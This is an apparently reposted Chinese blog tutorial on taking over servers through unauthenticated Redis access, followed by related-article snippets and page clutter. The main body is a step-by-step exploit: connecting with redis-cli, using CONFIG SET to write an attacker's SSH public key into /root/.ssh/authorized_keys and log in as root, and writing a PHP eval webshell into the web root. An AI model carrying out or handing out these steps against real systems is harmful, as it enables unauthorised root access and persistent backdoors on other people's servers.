Redis未授权访问导致服务器被控制

最新推荐文章于 2024-10-08 17:39:57 发布
最新推荐文章于 2024-10-08 17:39:57 发布
阅读量104 收藏
点赞数
文章标签: 数据库 运维 php
原文链接:https://yq.aliyun.com/articles/505577
版权

 通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!

    首先使用下列命令安装Redis tools:

1
root@kali:~ # apt-get install redis-tools

     然后通过下列命令看是否是未授权访问:

1
2
root@kali:~ # redis-cli -h 10.198.131.1
10.198.131.1:6379>

    然后我们可以使用免密登录的方式进行相关攻击:

    生成公钥:

1
2
3
4
root@lsy:~/. ssh # ssh-keygen -t rsa
root@lsy:~/. ssh # cat id_rsa.pub 
ssh -rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV /uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W +fWzbQkZbj /ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3 +fkwD+im2W966A5UEZZmzTzTi /qA9BZwZghRrEx8Mr5 +jVhQ8mYbR0QooggxTlafsavsBAG /aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk +TlQ8P5jm+ /pomKd ++aPSn root@lsy
root@lsy:~/. ssh #

    将公钥写入远程服务器:

1
2
3
4
5
6
7
8
9
10
root@lsy:~/. ssh # redis-cli -h 10.198.131.1
10.198.131.1:6379> CONFIG SET  dir  /root/ . ssh /
OK
10.198.131.1:6379> CONFIG SET dbfilename authorized_keys
OK
10.198.131.1:6379>  set  xxxx  "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy\n\n\n"
OK
10.198.131.1:6379> save
OK
10.198.131.1:6379>  exit

    使用ssh远程登录:

1
root@lsy:~/. ssh # ssh 10.198.131.1

    免密登录成功:

wKiom1mSV0KQs8wbAAFwicrDClk549.jpg-wh_50

上传webshell


1
2
3
4
5
#redis-cli -h 192.168.2.5 -p 6379
192.168.2.5:6379>config  set  dir   /var/wwww/html
192.168.2.5:6379>config  set  dbfilename 1.php
192.168.2.5:6379> set  webshell  "<php @eval(@_POST['passwd'])>"
192.168.2.5:6379>save


本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/1956311



weixin_33756418
关注
Redis授权访问漏洞记录(端口:6379、Linux、Windows)
墨痕诉清风的博客
11-12 7126
这就让黑客有了可乘之机,黑客可以远程连接到该数据库。但随着现代的服务部署方式的不断发展,组件化成了不可逃避的大趋势,docker就是这股风潮下的产物之一,而在这种部署模式下,一个单一的容器中不会有除 redis以外的任何服务存在,包括sh和 crontab,再加上权限的严格控制,只靠写文件就很难再 getshell了,在这种情况下,我们就需要其他的利用手段了。并且可以在 /root/.ssh/ 目录下看到我们上传的 authorized_keys 文件,正是由于这个文件的存在,我们才可以在本地用私钥登录。.
Redis授权访问
xuanlanxiao的博客
05-10 489
攻击者在授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh/authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。可以简单看一下这些,原因很简单,因为centos7自身存在防火墙,会将redis默认端口6379隐藏,不允许外界访问,所以这里kali访问失败,我们关掉centos7的防火墙再试一试。自己搭建的靶场可以拉拽redis压缩包进入虚拟机里。
Redis授权访问导致可远程获得服务器权限
weixin_33860553的博客
02-01 376
近日,魔方安全团队监控到针对Redis授权访问的一种新型***方式,在特定条件下,可远程导致服务器沦陷,魔方安全团队及时对该***方式进行了研究及威胁评估,并通过魔方矩阵情报系统在第一时间通知了部分用户进行修补,以下是漏洞原理以及复现的过程。漏洞原理及复现在复现前,先介绍两个基本所要了解的基础知识:1) SSH免密码登录,Linux下可以设置SSH免密码登录,方法为使用"公...
Redis无法启动或无法连接上
weixin_45644922的博客
04-14 2807
redis服务器无法启动或无法连接上 Kevin0is0me关注错误信息:Job for redis-server.service failed because the control process exited with error code. See “systemctl status redis-server.service” and “journalctl -xe” for detail...
谨防利用Redis授权访问漏洞入侵服务器
weixin_42100387的博客
11-24 1805
谨防利用Redis授权访问漏洞入侵服务器
redis授权访问
san3144393495的博客
06-15 1670
redis非关系型数据库
redis授权访问
尘玥的故事
06-13 375
redis 默认情况下,绑定在 0.0.0.0:6379,若没有采用相关的策略,如添加防火墙规则避免其他非信任来源 ip 访问等,会将 redis 服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 redis 以及读取 redis 的数据。
redis授权访问漏洞
Naive的博客
05-28 1487
Redis安装后,如果绑定在,并且没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的。
Redis授权访问漏洞
周星星的博客
08-22 1552
Redis授权访问漏洞复现以及利用
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
鲁班到家上门安装维修系统源码开发之结构功能解析
weixin_43744973的博客
10-08 587
鲁班到家上门安装维修系统的源码开发是一个复杂但富有成效的过程。通过详细的需求分析、技术选型、功能模块设计以及前后端分离开发,该系统不仅提升了服务效率,还通过数字化管理优化了用户体验。来,该系统有望在智能家居售后服务领域发挥更加重要的作用,引领行业向更加高效、专业、透明的方向发展。
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1370
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
ATAM需求说明-系统架构师(七十六)
ke1ying的博客
10-08 786
1体系结构权衡分析法ATAM(Architecture Trade Off Analyzer Method)是一种常见的结构权衡分析法,该框架主要关注系统的(),针对性能、安全性、可用性和可修改性,在系统开发前进行分析、评价和这种。A共享数据库的集成方式通常将应用程序的数据存储在一个共享数据库中,通过制定统一的数据库模式来处理不同应用集成需求。场景和需求的收集,架构视图和场景的实现,属性模型的构造和分析,架构评价和折中。7企业信息资源集成管理的前提是对企业()的集成,其核心是对企业()的集成。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 347
Wintergrasp 冬拥湖 120 VS 120
同城O2O系统源码与跑腿配送平台的架构设计与开发方案详解
最新发布
meihusdk的博客
10-08 397
同城O2O系统与跑腿配送平台的开发,既是技术的挑战,也是商业机会的探索。通过合理的架构设计与清晰的开发方案,开发者可以构建出高效、稳定且易于扩展的平台,为用户提供更为便捷的服务。
思迅商云开启货号修改语句
xushugang007的博客
10-03 240
insert into t_sys_system (sys_var_id,sys_var_name,sys_var_value,is_changed,sys_ver_flag) values('itemnoisedit','货号、供应商、客户编码修改','1','否','1')use hbposv10 --分店数据库名改成: hbposv10_branch。--开启 货号、供应商、客户编码修改。
一个真实可用的登录界面!
Q_w7742的博客
10-05 4049
至此,所有的代码运行之后应该可以实现输入账号密码,与数据库比对,重定向到欢迎界面这样的过程,可以将这个代码放在任何一个需要登录的网页中(自夸一下),当然还有很多很多的内容需要补充,留给你们自己发挥~这里如果php.ini设置不好可能会出现问题,找不到mysqli这个拓展,需要手动处理一下,当然这里不赘述。并且加密的过程被我注释掉了,防止新手搞不明白密码。首先需要一个静态网页,在前面已经讲了很多有关的代码,这里也是常规的,但是这里我们需要post到一个php页面,请注意。连接成功后,输入下面的代码,
Redis授权访问与SSH key利用分析
"Redis授权访问配合SSH key文件利用详解" ...理解Redis的安全风险并采取适当的防护措施至关重要,以防止授权访问导致的数据泄露和服务器被黑。对于已经暴露的Redis服务,应立即检查并修复配置,确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值